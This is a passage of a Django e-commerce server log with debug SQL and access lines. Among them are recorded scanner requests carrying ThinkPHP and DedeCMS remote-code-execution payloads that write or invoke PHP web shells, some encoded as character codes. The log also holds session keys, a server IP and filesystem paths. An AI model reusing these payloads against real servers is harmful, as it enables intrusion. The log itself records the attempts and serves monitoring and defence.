ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2020-01-01 08:56:48,050 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2020-01-01 08:56:48,053 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2020-01-01 08:56:48,055 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2020-01-01 08:56:48,057 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2020-01-01 08:56:48,060 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2020-01-01 08:56:48,064 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2020-01-01 08:56:48,066 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2020-01-01 08:56:48,068 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2020-01-01 08:56:48,071 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2020-01-01 08:56:48,073 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2020-01-01 08:56:48,077 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2020-01-01 08:56:48,080 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2020-01-01 08:56:48,082 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2020-01-01 08:56:48,084 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2020-01-01 08:56:48,087 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2020-01-01 08:56:48,091 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2020-01-01 08:56:48,093 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2020-01-01 08:56:48,095 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2020-01-01 08:56:48,098 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2020-01-01 08:56:48,100 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2020-01-01 08:56:48,102 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2020-01-01 08:56:48,105 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2020-01-01 08:56:48,108 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2020-01-01 08:56:48,110 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2020-01-01 08:56:48,113 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2020-01-01 08:56:48,116 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [01/Jan/2020 08:56:48] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [01/Jan/2020 08:56:48] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [01/Jan/2020 08:56:48] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 [01/Jan/2020 09:05:03] "GET / HTTP/1.0" 302 0 [01/Jan/2020 09:10:05] "GET / HTTP/1.0" 302 0 [01/Jan/2020 09:15:08] "GET / HTTP/1.0" 302 0 [01/Jan/2020 09:20:31] "GET / HTTP/1.0" 302 0 [01/Jan/2020 09:25:33] "GET / HTTP/1.0" 302 0 [01/Jan/2020 09:30:36] "GET / HTTP/1.0" 302 0 [01/Jan/2020 09:38:12] "GET / HTTP/1.0" 302 0 [01/Jan/2020 09:43:14] "GET / HTTP/1.0" 302 0 [01/Jan/2020 09:51:33] "GET / HTTP/1.0" 302 0 [01/Jan/2020 09:59:31] "GET / HTTP/1.0" 302 0 [01/Jan/2020 10:05:02] "GET / HTTP/1.0" 302 0 [01/Jan/2020 10:10:05] "GET / HTTP/1.0" 302 0 [01/Jan/2020 10:15:07] "GET / HTTP/1.0" 302 0 [01/Jan/2020 10:21:15] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-01 10:21:17,546 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '05ib6pchww5x0uqktf096tu98pan4si1' LIMIT 1; args=('05ib6pchww5x0uqktf096tu98pan4si1',) DEBUG 2020-01-01 10:21:17,549 utils 2749 140297233225472 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('05ib6pchww5x0uqktf096tu98pan4si1', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T10:21:17.546961+00:00'::timestamptz); args=('05ib6pchww5x0uqktf096tu98pan4si1', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 10, 21, 17, 546961, tzinfo=)) [01/Jan/2020 10:21:17] "GET /login/?next=/ HTTP/1.0" 200 1786 [01/Jan/2020 10:21:30] "GET / HTTP/1.0" 302 0 [01/Jan/2020 10:26:33] "GET / HTTP/1.0" 302 0 [01/Jan/2020 10:31:45] "GET / HTTP/1.0" 302 0 [01/Jan/2020 10:36:50] "GET / HTTP/1.0" 302 0 [01/Jan/2020 10:41:40] "GET / HTTP/1.0" 302 0 [01/Jan/2020 10:41:53] "GET / HTTP/1.0" 302 0 [01/Jan/2020 10:46:58] "GET / HTTP/1.0" 302 0 [01/Jan/2020 10:52:02] "GET / HTTP/1.0" 302 0 [01/Jan/2020 10:57:06] "GET / HTTP/1.0" 302 0 [01/Jan/2020 11:02:10] "GET / HTTP/1.0" 302 0 [01/Jan/2020 11:07:14] "GET / HTTP/1.0" 302 0 [01/Jan/2020 11:12:18] "GET / HTTP/1.0" 302 0 [01/Jan/2020 11:17:22] "GET / HTTP/1.0" 302 0 [01/Jan/2020 11:22:26] "GET / HTTP/1.0" 302 0 [01/Jan/2020 11:27:30] "GET / HTTP/1.0" 302 0 [01/Jan/2020 11:28:27] "GET / HTTP/1.0" 302 0 [01/Jan/2020 11:32:34] "GET / HTTP/1.0" 302 0 [01/Jan/2020 11:37:39] "GET / HTTP/1.0" 302 0 [01/Jan/2020 11:42:43] "GET / HTTP/1.0" 302 0 [01/Jan/2020 11:47:47] "GET / HTTP/1.0" 302 0 [01/Jan/2020 11:52:52] "GET / HTTP/1.0" 302 0 Not Found: /FCKeditor/editor/filemanager/connectors/asp/connector.asp [01/Jan/2020 11:54:36] "POST /FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F HTTP/1.0" 404 6538 Not Found: /index.php [01/Jan/2020 11:54:36] "GET /index.php?m=member&c=index&a=register&siteid=1 HTTP/1.0" 404 6387 Not Found: /admin_aspcms/_system/AspCms_SiteSetting.asp [01/Jan/2020 11:54:36] "POST /admin_aspcms/_system/AspCms_SiteSetting.asp HTTP/1.0" 404 6441 Not Found: /plus/moon.php [01/Jan/2020 11:54:36] "GET /plus/moon.php HTTP/1.0" 404 6350 Not Found: /plus/90sec.php [01/Jan/2020 11:54:36] "POST /plus/90sec.php HTTP/1.0" 404 6354 Not Found: /utility/convert/index.php [01/Jan/2020 11:54:37] "POST /utility/convert/index.php?a=config&source=d7.2_x2.0 HTTP/1.0" 404 6417 Not Found: /utility/convert/data/config.inc.php [01/Jan/2020 11:54:37] "POST /utility/convert/data/config.inc.php HTTP/1.0" 404 6417 Not Found: /uploads/dede/sys_verifies.php [01/Jan/2020 11:54:37] "GET /uploads/dede/sys_verifies.php?action=getfiles&refiles%5B0%5D=123&refiles%5B1%5D=%5C%22;eval($_POST%5Bysy%5D);die();// HTTP/1.0" 404 6494 Not Found: /uploads/dede/sys_verifies.php [01/Jan/2020 11:54:37] "POST /uploads/dede/sys_verifies.php?action=down HTTP/1.0" 404 6411 Not Found: /index.php/api/Uploadify/preview [01/Jan/2020 11:54:38] "POST /index.php/api/Uploadify/preview HTTP/1.0" 404 6405 Not Found: /user.php [01/Jan/2020 11:54:38] "GET /user.php?act=login HTTP/1.0" 404 6345 Not Found: /fdgq.php [01/Jan/2020 11:54:38] "POST /fdgq.php HTTP/1.0" 404 6336 [01/Jan/2020 11:54:39] "GET /?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=ynavg.php&content=%3C?php%20mb_ereg_replace('.*',@$_REQUEST%5B_%5D,%20'',%20'e');?%3E HTTP/1.0" 302 0 Not Found: /ynavg.php [01/Jan/2020 11:54:39] "POST /ynavg.php HTTP/1.0" 404 6339 Not Found: /user.php [01/Jan/2020 11:54:39] "GET /user.php?act=login HTTP/1.0" 404 6345 Not Found: /ysyqq.php [01/Jan/2020 11:54:39] "POST /ysyqq.php HTTP/1.0" 404 6339 [01/Jan/2020 11:54:39] "GET /?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=kzixs.php&vars%5B1%5D%5B%5D=%3C?php%20mb_ereg_replace('.*',@$_REQUEST%5B_%5D,%20'',%20'e');?%3E$ HTTP/1.0" 302 0 Not Found: /kzixs.php [01/Jan/2020 11:54:40] "POST /kzixs.php HTTP/1.0" 404 6339 Not Found: /plus/mytag_js.php [01/Jan/2020 11:54:40] "GET /plus/mytag_js.php?dopost=saveedit&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120&arrs2%5B%5D=109&arrs2%5B%5D=121&arrs2%5B%5D=116&arrs2%5B%5D=97&arrs2%5B%5D=103&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=40&arrs2%5B%5D=97&arrs2%5B%5D=105&arrs2%5B%5D=100&arrs2%5B%5D=44&arrs2%5B%5D=110&arrs2%5B%5D=111&arrs2%5B%5D=114&arrs2%5B%5D=109&arrs2%5B%5D=98&arrs2%5B%5D=111&arrs2%5B%5D=100&arrs2%5B%5D=121&arrs2%5B%5D=41&arrs2%5B%5D=32&arrs2%5B%5D=86&arrs2%5B%5D=65&arrs2%5B%5D=76&arrs2%5B%5D=85&arrs2%5B%5D=69&arrs2%5B%5D=83&arrs2%5B%5D=40&arrs2%5B%5D=57&arrs2%5B%5D=48&arrs2%5B%5D=57&arrs2%5B%5D=48&arrs2%5B%5D=44&arrs2%5B%5D=39&arrs2%5B%5D=60&arrs2%5B%5D=63&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=32&arrs2%5B%5D=101&arrs2%5B%5D=99&arrs2%5B%5D=104&arrs2%5B%5D=111&arrs2%5B%5D=32&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=100&arrs2%5B%5D=101&arrs2%5B%5D=100&arrs2%5B%5D=101&arrs2%5B%5D=99&arrs2%5B%5D=109&arrs2%5B%5D=115&arrs2%5B%5D=32&arrs2%5B%5D=53&arrs2%5B%5D=46&arrs2%5B%5D=55&arrs2%5B%5D=32&arrs2%5B%5D=48&arrs2%5B%5D=100&arrs2%5B%5D=97&arrs2%5B%5D=121&arrs2%5B%5D=60&arrs2%5B%5D=98&arrs2%5B%5D=114&arrs2%5B%5D=62&arrs2%5B%5D=103&arrs2%5B%5D=117&arrs2%5B%5D=105&arrs2%5B%5D=103&arrs2%5B%5D=101&arrs2%5B%5D=44&arrs2%5B%5D=32&arrs2%5B%5D=57&arrs2%5B%5D=48&arrs2%5B%5D=115&arrs2%5B%5D=101&arrs2%5B%5D=99&arrs2%5B%5D=46&arrs2%5B%5D=111&arrs2%5B%5D=114&arrs2%5B%5D=103&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=59&arrs2%5B%5D=64&arrs2%5B%5D=112&arrs2%5B%5D=114&arrs2%5B%5D=101&arrs2%5B%5D=103&arrs2%5B%5D=95&arrs2%5B%5D=114&arrs2%5B%5D=101&arrs2%5B%5D=112&arrs2%5B%5D=108&arrs2%5B%5D=97&arrs2%5B%5D=99&arrs2%5B%5D=101&arrs2%5B%5D=40&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=47&arrs2%5B%5D=91&arrs2%5B%5D=99&arrs2%5B%5D=111&arrs2%5B%5D=112&arrs2%5B%5D=121&arrs2%5B%5D=114&arrs2%5B%5D=105&arrs2%5B%5D=103&arrs2%5B%5D=104&arrs2%5B%5D=116&arrs2%5B%5D=93&arrs2%5B%5D=47&arrs2%5B%5D=101&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=44&arrs2%5B%5D=36&arrs2%5B%5D=95&arrs2%5B%5D=82&arrs2%5B%5D=69&arrs2%5B%5D=81&arrs2%5B%5D=85&arrs2%5B%5D=69&arrs2%5B%5D=83&arrs2%5B%5D=84&arrs2%5B%5D=91&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=103&arrs2%5B%5D=117&arrs2%5B%5D=105&arrs2%5B%5D=103&arrs2%5B%5D=101&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=93&arrs2%5B%5D=44&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=101&arrs2%5B%5D=114&arrs2%5B%5D=114&arrs2%5B%5D=111&arrs2%5B%5D=114&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=41&arrs2%5B%5D=59&arrs2%5B%5D=63&arrs2%5B%5D=62&arrs2%5B%5D=39&arrs2%5B%5D=41&arrs2%5B%5D=59&arrs2%5B%5D=0 HTTP/1.0" 404 9682 Not Found: /plus/download.php [01/Jan/2020 11:54:40] "GET /plus/download.php?open=1&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120&arrs2%5B%5D=109&arrs2%5B%5D=121&arrs2%5B%5D=97&arrs2%5B%5D=100&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=83&arrs2%5B%5D=69&arrs2%5B%5D=84&arrs2%5B%5D=32&arrs2%5B%5D=96&arrs2%5B%5D=110&arrs2%5B%5D=111&arrs2%5B%5D=114&arrs2%5B%5D=109&arrs2%5B%5D=98&arrs2%5B%5D=111&arrs2%5B%5D=100&arrs2%5B%5D=121&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=61&arrs2%5B%5D=32&arrs2%5B%5D=39&arrs2%5B%5D=60&arrs2%5B%5D=63&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=32&arrs2%5B%5D=102&arrs2%5B%5D=105&arrs2%5B%5D=108&arrs2%5B%5D=101&arrs2%5B%5D=95&arrs2%5B%5D=112&arrs2%5B%5D=117&arrs2%5B%5D=116&arrs2%5B%5D=95&arrs2%5B%5D=99&arrs2%5B%5D=111&arrs2%5B%5D=110&arrs2%5B%5D=116&arrs2%5B%5D=101&arrs2%5B%5D=110&arrs2%5B%5D=116&arrs2%5B%5D=115&arrs2%5B%5D=40&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=109&arrs2%5B%5D=111&arrs2%5B%5D=111&arrs2%5B%5D=110&arrs2%5B%5D=46&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=44&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=60&arrs2%5B%5D=63&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=32&arrs2%5B%5D=101&arrs2%5B%5D=118&arrs2%5B%5D=97&arrs2%5B%5D=108&arrs2%5B%5D=40&ar HTTP/1.0" 404 8059 Not Found: /admin_aspcms/_system/AspCms_SiteSetting.asp [01/Jan/2020 11:54:40] "POST /admin_aspcms/_system/AspCms_SiteSetting.asp HTTP/1.0" 404 6441 Not Found: /e/DoInfo/ecms.php [01/Jan/2020 11:54:41] "POST /e/DoInfo/ecms.php HTTP/1.0" 404 6363 [01/Jan/2020 11:57:56] "GET / HTTP/1.0" 302 0 [01/Jan/2020 12:02:56] "GET / HTTP/1.0" 302 0 [01/Jan/2020 12:08:04] "GET / HTTP/1.0" 302 0 [01/Jan/2020 12:13:08] "GET / HTTP/1.0" 302 0 [01/Jan/2020 12:18:11] "GET / HTTP/1.0" 302 0 [01/Jan/2020 12:23:16] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [01/Jan/2020 12:26:49] "GET /proxy.php HTTP/1.0" 404 6344 [01/Jan/2020 12:28:20] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 185.61.137.172/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [01/Jan/2020 12:31:02] "POST /editBlackAndWhiteList HTTP/1.0" 500 64008 [01/Jan/2020 12:33:24] "GET / HTTP/1.0" 302 0 [01/Jan/2020 12:33:42] "GET / HTTP/1.0" 302 0 [01/Jan/2020 12:38:29] "GET / HTTP/1.0" 302 0 [01/Jan/2020 12:40:01] "GET /whm-server-status HTTP/1.0" 301 0 [01/Jan/2020 12:43:34] "GET / HTTP/1.0" 302 0 Not Found: /solr/admin/info/system [01/Jan/2020 12:45:52] "GET /solr/admin/info/system?wt=json HTTP/1.0" 404 6384 [01/Jan/2020 12:48:37] "GET / HTTP/1.0" 302 0 [01/Jan/2020 12:52:35] "GET / HTTP/1.0" 302 0 [01/Jan/2020 12:53:42] "GET / HTTP/1.0" 302 0 [01/Jan/2020 12:58:45] "GET / HTTP/1.0" 302 0 [01/Jan/2020 13:03:50] "GET / HTTP/1.0" 302 0 [01/Jan/2020 13:08:54] "GET / HTTP/1.0" 302 0 [01/Jan/2020 13:13:59] "GET / HTTP/1.0" 302 0 [01/Jan/2020 13:20:34] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.0" 302 0 [01/Jan/2020 13:20:34] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0" 302 0 DEBUG 2020-01-01 13:20:34,675 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '6z3ku0prpz3vnx5gt87v696v6gdtqqdm' LIMIT 1; args=('6z3ku0prpz3vnx5gt87v696v6gdtqqdm',) DEBUG 2020-01-01 13:20:34,678 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('6z3ku0prpz3vnx5gt87v696v6gdtqqdm', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T13:20:34.676039+00:00'::timestamptz); args=('6z3ku0prpz3vnx5gt87v696v6gdtqqdm', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 13, 20, 34, 676039, tzinfo=)) [01/Jan/2020 13:20:34] "GET /login/?next=/%3Fa%3Dfetch%26content%3D%253Cphp%253Edie%28%40md5%28HelloThinkCMF%29%29%253C/php%253E HTTP/1.0" 200 1936 DEBUG 2020-01-01 13:20:34,885 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'k1y1he54jenw7h8irl0wnh2oqhxak7a1' LIMIT 1; args=('k1y1he54jenw7h8irl0wnh2oqhxak7a1',) DEBUG 2020-01-01 13:20:34,887 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('k1y1he54jenw7h8irl0wnh2oqhxak7a1', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', 